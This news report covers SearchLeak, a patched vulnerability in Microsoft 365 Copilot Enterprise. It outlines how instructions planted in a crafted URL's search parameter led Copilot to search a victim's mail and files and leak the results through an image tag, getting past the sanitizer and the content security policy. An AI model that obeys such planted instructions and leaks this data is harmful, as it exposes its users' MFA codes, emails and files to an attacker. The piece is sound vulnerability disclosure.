Microsoft patched a critical vulnerability in Microsoft 365 (M365) Copilot Enterprise on June 4 that let an attacker steal multi-factor authentication (MFA) codes, emails, calendar data, and organizational files with a single click on a legitimate Microsoft URL.
Varonis Threat Labs researcher Dolev Taler, credited in Microsoft’s CVE-2026-42824 advisory, named the chain SearchLeak. It links a Parameter-to-Prompt (P2P) injection with an HTML rendering race condition and a Content Security Policy (CSP) bypass via Bing server-side request forgery (SSRF).
A crafted URL plants instructions inside the Copilot Enterprise Search query parameter. Copilot reads them as commands, searches the target’s mailbox or files, and embeds the results in an image tag.
“To exfiltrate the data, an attacker crafts a URL that tells Copilot to search the user’s emails, extract the title, and embed it in an image URL,” Taler wrote.
Copilot’s sanitizer wraps output in code blocks after generation ends, but browsers render the incoming stream live. The injected image tag fires before the sanitizer runs, and the chain routes the request through Bing’s CSP-allowlisted “Search by Image” endpoint with stolen data encoded in the path.
MFA codes and password-reset links carry the highest exposure, with account takeover possible before they expire. The attack inherits the victim’s Microsoft Graph permissions, reaching SharePoint documents, OneDrive files, and calendar data across the organization.
Microsoft’s own Common Vulnerability Scoring System (CVSS) 3.1 submission scored CVE-2026-42824 at 6.5, below the 7.5 the National Vulnerability Database (NVD) assigned and below the critical rating Microsoft applied internally. Tenant administrators had no patch to apply. Microsoft resolved the flaw on its backend.
SearchLeak is the third consecutive one-click Copilot exfiltration chain from Varonis, following Reprompt against Copilot Personal in January 2026 and Aim Security’s zero-click EchoLeak in 2025. Each broke through a higher-tier deployment. Varonis confirmed no in-the-wild exploitation.
